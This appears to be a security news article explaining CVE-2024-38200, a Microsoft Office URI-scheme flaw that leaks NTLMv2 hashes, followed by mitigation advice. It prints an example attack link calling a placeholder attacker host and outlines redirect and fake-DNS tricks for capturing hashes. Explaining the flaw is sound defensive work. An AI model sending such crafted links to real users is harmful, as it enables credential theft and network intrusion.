CVE-2024-38200 Exploited: How Hackers Can Steal NTLMv2 Hashes from Microsoft Office
The recent vulnerability in Microsoft Office, identified as CVE-2024-38200 with a CVSS score of 9.1, enables the interception of NTLMv2 hashes, which could potentially be used for attacks on corporate networks. All its technical details have been revealed, it is time to delve into the matter more comprehensively.
The NTLMv2 hash represents authentication data transmitted by the system to verify a user’s identity. If exploited correctly, malicious actors can gain access to secured resources and even escalate their privileges within the network.
The core issue with CVE-2024-38200 is linked to Office URI schemes—special links that allow files to be opened directly from applications like Word and Excel. It turns out that this scheme can be manipulated to send a request to a remote server, intercepting the victim’s NTLMv2 hash. This can be achieved by sending the user a specially crafted link in the format “ms-word:ofe|u|http://<attack address>/leak.docx”. When attempting to open such a file, Office queries the remote resource, leading to the leakage of the hash.
Microsoft 365 Office and Office 2019 are particularly vulnerable, as they allow remote file downloads without warning, significantly simplifying the interception of hashes by attackers. In older versions, such as Office 2016, a security warning is displayed, making the attack more challenging to execute.
A critical detail is that attackers can redirect the request to a UNC resource (Universal Naming Convention path) using a 302 redirection. This technique bypasses defenses, allowing the NTLMv2 hash to be captured through SMB or HTTP. An HTTP-based attack is easier to perform and more effective for launching subsequent attacks on domain controller servers.
The success of the attack largely depends on the security settings (GPO) of the victim’s computer. If automatic authentication is enabled for local intranet zones or trusted sites, Office will automatically authenticate upon opening such a link, sending the NTLMv2 hash to the attacker’s server. In this way, even an ordinary domain user may unwittingly expose their authentication data.
In stricter security settings, attackers can create a fake DNS record and redirect the request to their server, tricking the system into recognizing it as a local resource, whereupon the hash is again captured by the attackers.
To protect against this vulnerability, it is recommended to update Office applications to the latest versions, modify local network settings by disabling automatic authentication, and activate additional security measures for LDAP connections.
